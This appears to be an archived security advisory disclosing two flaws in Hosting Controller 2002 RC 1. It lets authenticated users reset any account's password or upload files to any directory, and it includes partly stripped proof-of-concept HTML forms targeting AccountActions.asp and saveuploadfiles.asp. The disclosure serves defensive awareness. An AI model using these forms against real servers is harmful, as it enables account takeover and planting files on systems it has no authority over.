TUCoPS :: Web :: General :: b06-1355.htm

Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC)
Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC)
Hosting Controller AccountActions.asp and saveuploadfiles.asp vulns (PoC)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
i've found 2 vulnerabilities in Hosting Controller that allows remote
authenticated users to change every user password or upload files in every
directory. Here are the PoC:

This allows to modify passwords:

action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser 
"
method="post">
Username: 


Name: 


ChangePass (type true): 


Password: 


Confirm: 








PS: You should have authenticated access.



- -------------------------

Vulnerable versions:

- - HC 2002 RC 1

Other versions may be vulnerable


And this allows to upload:

action="http://[URL]/admin/folders/saveuploadfiles.asp" 
enctype="multipart/form-data">
Where upload files: 


File 1: 

File 2: 

File 3: 

File 4: 






PS: If you see an error message, it's not important. You just should have
authenticated access.





- -------------------------

Vulnerable versions:

- - HC 2002 RC 1

Other versions may be vulnerable

This vulns are tested with HC 2002 RC 1, but other versions may be
vulnerable.


Sorry for my english, but i'm Italian.

-----BEGIN PGP SIGNATURE-----
Version: 6.5.8ckt http://www.ipgpp.com/ 

iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh
KUkiwb7H3FkEdfZcORRpl4LH
=qlwF
-----END PGP SIGNATURE-----

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH